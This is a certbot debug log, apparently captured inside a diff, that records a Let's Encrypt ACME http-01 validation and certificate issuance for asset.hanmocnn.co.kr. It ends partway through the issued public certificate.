"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkludlBuajYwODJOakY3VmZNR1ZNcTVydmRBazB0ZFV6SGZrMkxCUWlOX1UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0", - "signature": "jsBiP_GinWoex0fg3-Cdea-VuKuiTqzQnoZwpkLhn9rxAkYe6vmD2P6rY4u9tgtr-Ln-z6-Y0whY1jMYThfea6ncRWvgmaw2w520eoGFPda-InNb0JWJ5XHM93ItsdYs228hM1EB8EUTq-ARcB2LhXxaiuUK3kFOFmoln9Ekfo0Ow53-wG-roUIuAEwG2FtX8J_oxn-1fzm7FURWyV2oZLrDBQLtk05flxl7YbftjHKW1e0ukuC-1yiTmDr1ABIVCffIrU6gr_oKXL6IWObVfjIWWEgqXSpMH7HFtW5Kql73qjaarl-Tyz86POly2UQHtitudZ7xX0OYnbDZMRFDyw", - "payload": "" -} -2026-02-14 22:59:03,495:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828 -2026-02-14 22:59:03,496:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:03 GMT -Content-Type: application/json -Content-Length: 828 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:59:03Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - } - ] -} -2026-02-14 22:59:03,496:DEBUG:acme.client:Storing nonce: NeKnt8TGeS1KvxtCH01Kudwai4J_7cvf6w6TlwiwGz_1lyO0dIQ -2026-02-14 22:59:03,497:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'} -2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-14 22:59:03,497:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='asset.hanmocnn.co.kr') -2026-02-14 22:59:03,497:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-14 22:59:03,498:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-14 22:59:03,499:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs -2026-02-14 22:59:03,500:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-14 22:59:03,504:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VTMUt2eHRDSDAxS3Vkd2FpNEpfN2N2ZjZ3NlRsd2l3R3pfMWx5TzBkSVEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2L2JXWS10ZyJ9", - "signature": "AB8QdQhOPhFKnAgDOMQR-4cKyHUTqsh8px5OEL8IPwcA1TUlP_ok0X7p1t6Y8akwLyCZl-hYngxHDbdJuSk3bEx2d3HzzCHIy7IoMEUXDa8Q0N1SAO1MNp0xdcGLFS8VwJwj29of318S7J1K0U3JvwFmY7sSzjqEm9TBTydWpu1BPNr64DLLPuyFIVks3Z14GYzVSzIMHtkNU19FcD25hFr8IkUfAgFdxKnoYwF0g6tdX9VzMUaMFOkQo4FPVb0q5ofDdsojIAaETvynTPGUx3Gi2RnS-WPRZW2dODiWTbMcNhoTo_qvGFTup29GyGf26mmTLID0xPohUABm9qx-8A", - "payload": "e30" -} -2026-02-14 22:59:03,679:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658770786636/bWY-tg HTTP/1.1" 200 195 -2026-02-14 22:59:03,680:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:03 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg -Replay-Nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" -} -2026-02-14 22:59:03,680:DEBUG:acme.client:Storing nonce: NeKnt8TGRpLEM98vPidFNGYZLhniMzbW0ZgaRAcNcHMdxsudar4 -2026-02-14 22:59:03,681:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-14 22:59:04,681:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:04,686:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JwTEVNOTh2UGlkRk5HWVpMaG5pTXpiVzBaZ2FSQWNOY0hNZHhzdWRhcjQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0", - "signature": "lqMsMOa-tUArJGS6N0hsMij68VjUFY48A2N6C_ro3al7tuGMf1XEiIEmRFGlK3X0X8IsrQPx4ej6Q22199sngBR1VJpP2X5mL8MYNQ2DipAlvMnWuNs8LUqsNRo05eKZoP1TbVp39qG6LklndIiCbuyxCcHJ3DKFpQzbOURUqAX_rbJfEkNQ3NHBgkkMFieByCnag80G9H2PfhHp26mYg4l0NTqRPc1Eii7yg70oMwer-gAzrsi4xwHACrD-LwQD3Eok7CLzaXlyu81UGVXFMVLYKEgbisAK_UtUVJlxfKjV6gvFpNpL_4VskR4LLoUFJ_X9LBnsqH5r-kz21Wlxkg", - "payload": "" -} -2026-02-14 22:59:04,850:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828 -2026-02-14 22:59:04,851:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:04 GMT -Content-Type: application/json -Content-Length: 828 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:59:03Z", - "challenges": [ - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - } - ] -} -2026-02-14 22:59:04,851:DEBUG:acme.client:Storing nonce: NeKnt8TGHW4lMhMmVdh1Jz0VwzPkUfV13XBXPHC3SxBVS6LSJd0 -2026-02-14 22:59:04,851:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'} -2026-02-14 22:59:07,852:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:07,857:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0hXNGxNaE1tVmRoMUp6MFZ3elBrVWZWMTNYQlhQSEMzU3hCVlM2TFNKZDAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0", - "signature": "QCjdqTcoky09Iivejj8OrcpoMGEMjAELmU5tH_5Fapt_tiHcaVIR5Vc3NBiO7vfeebmwEIIzADkvwHoqG7Epms-H4nQShQDPZdXdCxiry3x1DEVa2-3U-aPAiNN28I7WKMQNgipHA0EzT5b9QZzgs5g-Y-bz7kAOrggvBD9e9jejCbP0H0XHMbjqayajRwqppuetN2q7pyN2mTah6ytKL2x1k7NMhJZ124DQeZcAVn9AQlCU-_fbr9vgvzW9d5YqnBTTkQUGsiSC1M1HZ4oYm8yYTuuje-fIIvtWRxUeXvsUrPIsMhFOH-7foMWyNr0upwf1r7Ifo1K9NVtpJb6svg", - "payload": "" -} -2026-02-14 22:59:08,018:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 828 -2026-02-14 22:59:08,019:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:07 GMT -Content-Type: application/json -Content-Length: 828 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T22:59:03Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/ZQcSng", - "status": "pending", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs" - } - ] -} -2026-02-14 22:59:08,019:DEBUG:acme.client:Storing nonce: NeKnt8TG7x2394sOWVy6kZh5Ix7io-g9_X7c9_aBMoyHXO7TPBg -2026-02-14 22:59:08,019:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/cIGMlA', 'status': 'pending', 'token': '_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs'} -2026-02-14 22:59:11,020:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:11,025:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzd4MjM5NHNPV1Z5NmtaaDVJeDdpby1nOV9YN2M5X2FCTW95SFhPN1RQQmciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzcwNzg2NjM2In0", - "signature": "Ldxrn7k1DP_uQlFHFvMQhUxVgFGNXgyB5QwZ6J6zt-QILlDAJemOF6XxvpEoan56zOoTQFAF-E4a4Fb_T69BZGzHLwqbLd7pvsu6BpfIZ9BKqy3CiOPyd6P3aeYUNz2G9oblHxaUTj76yhRZ4LreMMUoZBIOX9TsAzA-AjqT2f4FtnPTCNvFfd4HjvjSFAz1MBcnCBeL4I2YXooKtGAUMD-tawfZbZMw2nXavM1dQS16jLrWVGEU3fAB2oAlsW8fz5oZCgQf-nhYmzfillCzb1n3G7D_FstbVcOSAdcMn2KxfndxwXf_HzLKaVxXe_WbCn4ojRQfCB_ecNdRk4XWbw", - "payload": "" -} -2026-02-14 22:59:11,189:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658770786636 HTTP/1.1" 200 783 -2026-02-14 22:59:11,190:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:11 GMT -Content-Type: application/json -Content-Length: 783 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - }, - "status": "valid", - "expires": "2026-03-16T22:59:09Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658770786636/bWY-tg", - "status": "valid", - "validated": "2026-02-14T22:59:03Z", - "token": "_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs", - "validationRecord": [ - { - "url": "http://asset.hanmocnn.co.kr/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs", - "hostname": "asset.hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "222.117.41.51" - ], - "addressUsed": "222.117.41.51" - } - ] - } - ] -} -2026-02-14 22:59:11,190:DEBUG:acme.client:Storing nonce: NeKnt8TGRU1HvCLUtMedL_PWvsFY5XO4Pk_SF1R_Oj27V3w8DBY -2026-02-14 22:59:11,191:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-14 22:59:11,191:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/_4VgvLO6sgPaYPdNG-fIZQ5jnTsMVScS5V625Qa9iTs -2026-02-14 22:59:11,191:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZ\nI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89oqy/XC6K\nS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/CioDIwMAYJKoZIhvcN\nAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjO\nPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f+XH4fD4znqweIKxf4wcy7cuSnwIen\n35GhFB+6DqQXeRgCMEc5DM/pAiGgSrRTP1U2QZ8qDZgOJl+GRANbmOGaBo22tBrf\nLPi9rBm2X2PP6tQNKw==\n-----END CERTIFICATE REQUEST-----\n', form='pem') -2026-02-14 22:59:11,192:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-02-14 23:00:41.192628 -2026-02-14 22:59:11,193:DEBUG:acme.client:JWS payload: -b'{\n "csr": "MIIBKTCBsQIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50LGZLNqLZI-HF8yTMleRX-LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774_89oqy_XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO_CioDIwMAYJKoZIhvcNAQkOMSMwITAfBgNVHREEGDAWghRhc3NldC5oYW5tb2Nubi5jby5rcjAKBggqhkjOPQQDAgNnADBkAjBHU9b6je1e67iRpIKL75f-XH4fD4znqweIKxf4wcy7cuSnwIen35GhFB-6DqQXeRgCMEc5DM_pAiGgSrRTP1U2QZ8qDZgOJl-GRANbmOGaBo22tBrfLPi9rBm2X2PP6tQNKw"\n}' -2026-02-14 22:59:11,197:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1JVMUh2Q0xVdE1lZExfUFd2c0ZZNVhPNFBrX1NGMVJfT2oyN1YzdzhEQlkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0", - "signature": "XnpECPUS8omlpPj4uWeSuoaPg43d5qm1xHW-myYldQmE-Fj_xEfiBLY66cGWDy83FPo5UEkMjKAemg38qC8u0UbGz8aMZPtAJbvYfdv9kCr6v-vJZp345dl4M0_bSmZEAZRRO08UYab3Af1lfDUlp6LB2AbkXBWZ0cp1crluoNOGY5MFLQILwS2hdCkIV0vFbUPyzyZF7xC9rJ3F2hl07OoyqoBcHHwwifsynUeYm0V9XrYhJ0T8bQErHvGNQMTmfrQC32eT-hmK1tSJ4Vp5yza_Ac0xoK3hv0GftuXJzkXEc5qXzREW29k18PFpM8fn6rrgyM7jHR8kKnCFVJViRA", - "payload": "ewogICJjc3IiOiAiTUlJQktUQ0JzUUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFWFp1V3d3NTBMR1pMTnFMWkktSEY4eVRNbGVSWC1McG1vR0xVTkZHeGdZU0F6VmdMcWt3emRZdENaV2daVWVYM1J6Nzc0Xzg5b3F5X1hDNktTMTJIUjNaQndZSEd1aFdXYkpQNGJaYnY2N0FKWmQ1VUhka2NjTmE5d3lCRU9fQ2lvREl3TUFZSktvWklodmNOQVFrT01TTXdJVEFmQmdOVkhSRUVHREFXZ2hSaGMzTmxkQzVvWVc1dGIyTnViaTVqYnk1cmNqQUtCZ2dxaGtqT1BRUURBZ05uQURCa0FqQkhVOWI2amUxZTY3aVJwSUtMNzVmLVhINGZENHpucXdlSUt4ZjR3Y3k3Y3VTbndJZW4zNUdoRkItNkRxUVhlUmdDTUVjNURNX3BBaUdnU3JSVFAxVTJRWjhxRFpnT0psLUdSQU5ibU9HYUJvMjJ0QnJmTFBpOXJCbTJYMlBQNnRRTkt3Igp9" -} -2026-02-14 22:59:13,485:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480360701606 HTTP/1.1" 200 456 -2026-02-14 22:59:13,486:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:13 GMT -Content-Type: application/json -Content-Length: 456 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606 -Replay-Nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T22:59:03Z", - "identifiers": [ - { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5" -} -2026-02-14 22:59:13,486:DEBUG:acme.client:Storing nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto -2026-02-14 22:59:14,487:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:14,492:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2tpQUZ5bWd5WHg5MXNqby1PQnJFLW9RZmtBSUE1QmtFVEFjVmJYRFFsdG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0", - "signature": "Z-7PwibQOXUSAB_CO21hOY9cgXtdwG1rm6XbsU4bvAqs1jZQZie589vOdI2zqaHJdzvFygp4EGdSgVP-BTTHKah86AXQi2cEpkFDkXE-PwfqdVWepDBJSbmRV153pH5jNVImDtZfa_khZder6EIjXsliW_jOFfMko6gGMvTz6lfWZMHvJ6tvDvg0f8QoQgsGwkBGQOFtp54nCoV9axiaDyaKqBHJul_7guWVSQRc8kvH18e3mBon4gIoENyM79F4tyL25XkSVPkfFyFgOtvVzMK5fnsm-3InU9K4t6-LLzRf-bUakcdTeK4aN1VAJGVmUo0ov0EYRe0RYHitfjQa9w", - "payload": "" -} -2026-02-14 22:59:14,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480360701606 HTTP/1.1" 200 456 -2026-02-14 22:59:14,655:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:14 GMT -Content-Type: application/json -Content-Length: 456 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606 -Replay-Nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "valid", - "expires": "2026-02-21T22:59:03Z", - "identifiers": [ - { - "type": "dns", - "value": "asset.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606", - "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5" -} -2026-02-14 22:59:14,655:DEBUG:acme.client:Storing nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc -2026-02-14 22:59:14,655:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 22:59:14,659:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmxQaFd4QV94SDNwWDFHS01KMUpER2hkQndQZEV3aTM2NU9XYUNRMHRMeGMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1In0", - "signature": "aNwI7RwCcv76J8ktGfy0gChQ1ua2ZM9ov4ueZs4nFi9cOfah2fT650Dp4kh6gOcUMHfts5-LMvj4EwFqD5QAjpI2A9ge_KIC0Tifji0eRRuBF9YzcI7k3UodzNmOCMsO3w-ylFA3SWDDwOoUaLnyLY3FXVxhCjMlvKJohHZVMkTHivtzZxkfC_Z46zlzh5PVqP5qO2bkANnKsnrlYtXx6MVn0_Wv3NwU2cQC8b_lmdD5lDpTKjQHHx-HzCAFoPECSW2DFKBLUKKA4OSOjvepqAct2LI0YY-6vBZxtvAZlroXLPtENtMIP0pYlv_b0pGwrzVsyQSEGZRtgFxEahwlTA", - "payload": "" -} -2026-02-14 22:59:14,820:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5 HTTP/1.1" 200 2909 -2026-02-14 22:59:14,821:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 22:59:14 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2909 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz -c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50 -LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89 -oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC -Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB -/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA -FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw -AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t -b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf -hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE 